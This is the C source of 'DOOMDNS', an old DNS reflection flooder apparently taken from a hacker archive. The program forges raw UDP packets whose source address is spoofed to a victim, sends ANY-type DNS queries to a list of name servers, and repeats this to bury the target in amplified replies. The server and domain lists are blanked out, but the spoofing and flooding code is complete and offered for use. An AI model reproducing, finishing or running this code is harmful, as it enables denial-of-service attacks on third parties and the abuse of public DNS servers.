home *** CD-ROM | disk | FTP | other *** search
- /******************************************************************
- * *
- * DOOMDNS Yet another flooder with 1:x pkts ratio. This one *
- * exploits DNS simple QUERY with spoofed UDPs. *
- * Since almost every DNS is bound to answer queries *
- * from the void, and since UDP doesn't provide a *
- * fruitful authentication process cause plain TCP *
- * does, uh !? ;) here we are. *
- * *
- * hints by |scacco|, code by FuSyS *
- * http://www.s0ftpj.org *
- * *
- ******************************************************************/
-
- #include <stdio.h>
- #include <string.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <arpa/inet.h>
- #include <arpa/nameser.h>
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/udp.h>
- #include <netdb.h>
- #include <time.h>
-
- #define IP_HEAD_BASE 20
- #define UDP_HEAD_BASE 8
-
- unsigned long saddr;
- int sfd, loop;
- char *dns_def[]={/* LISTA ASSENTE */ ,NULL};
- char *domains[]={/* LISTA ASSENTE */ ,NULL};
-
- struct DNS_MSG
- {
- HEADER head;
- char query[255];
- };
-
- struct dns_pkt
- {
- struct iphdr ip;
- struct udphdr udp;
- char data[1000];
- };
-
- unsigned long nameResolve(char *hostname)
- {
- struct in_addr addr;
- struct hostent *hostEnt;
-
- if((addr.s_addr=inet_addr(hostname)) == -1)
- {
- if(!(hostEnt=gethostbyname(hostname)))
- {
- fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname);
- exit(0);
- }
- bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
- }
- return addr.s_addr;
- }
-
- void forge (unsigned long daddr, unsigned short src, unsigned short dst)
- {
- struct sockaddr_in sin;
- struct dns_pkt dpk;
- struct DNS_MSG killer;
- int shoot, len;
-
- memset(&killer, 0, sizeof(killer));
- killer.head.id=getpid();
- killer.head.rd=1;
- killer.head.aa=0;
- killer.head.opcode=QUERY;
- killer.head.qr=0;
- killer.head.qdcount=htons(1);
- killer.head.ancount=htons(0);
- killer.head.nscount=htons(0);
- killer.head.arcount=htons(0);
- strcat(killer.query, domains[--loop]);
- killer.query[strlen(domains[loop])+2]=0x00FF;
- killer.query[strlen(domains[loop])+4]=0x0001;
-
- memset(&dpk, 0, sizeof(dpk));
-
- dpk.udp.source=src;
- dpk.udp.dest=dst;
- len=(12+strlen(killer.query)+5);
- dpk.udp.len=htons(UDP_HEAD_BASE+len);
- memcpy(dpk.data, (void*)&killer, len);
-
- dpk.ip.ihl=5;
- dpk.ip.version=4;
- dpk.ip.tos=0;
- dpk.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+len);
- dpk.ip.frag_off=0;
- dpk.ip.ttl=64;
- dpk.ip.protocol=IPPROTO_UDP;
- dpk.ip.saddr=saddr;
- dpk.ip.daddr=daddr;
-
- memset(&sin, 0, sizeof(sin));
- sin.sin_family=AF_INET;
- sin.sin_port=dst;
- sin.sin_addr.s_addr=daddr;
-
- shoot=sendto(sfd, &dpk,IP_HEAD_BASE+UDP_HEAD_BASE+len,
- 0, (struct sockaddr *)&sin, sizeof(sin));
- if(shoot<0)fprintf(stderr, "SPOOF ERROR");
- loop++;
- }
-
- void doomzone (void)
- {
- unsigned long daddr;
- unsigned short source, dest;
-
- if(dns_def[loop]==NULL) loop=0;
- daddr=nameResolve(dns_def[loop++]);
- source=htons(1024+(rand()%2000));
- dest=htons(53);
- forge(daddr, source, dest);
- }
-
- int main (int argc, char **argv)
- {
- int sfdo;
- unsigned int hz=100;
-
- if(argc<2)
- {
- fprintf(stderr, "Interesting .... let's flood ourselves ?!\n");
- fprintf(stderr, "Use: %s target [n]\n", argv[0]);
- exit(0);
- }
-
- if(argv[2]) hz=atoi(argv[2]);
- saddr=nameResolve(argv[1]);
-
- srand(time(NULL));
-
- if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0)
- {
- fprintf(stderr, "\nSOCK_RAW Died\n");
- exit(2);
- }
- sfdo=1;
- if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0)
- {
- fprintf(stderr, "\nIP_HDRINCL Died\n");
- exit(3);
- }
-
- printf("\n\033[1;32mD00M DNS\033[0m");
- printf("\n\033[1;34mDNS Flooder by FuSyS\033[0m");
- printf("\n\033[1;34minithints by |scacco|\033[0m\n\n");
-
- loop=0;
- while(hz--)
- {
- doomzone();
- printf("\033[1;34m.\033[0m");
- }
- printf("\n\n");
- return(0);
- }
- /* www.hack.co.za [2000]*/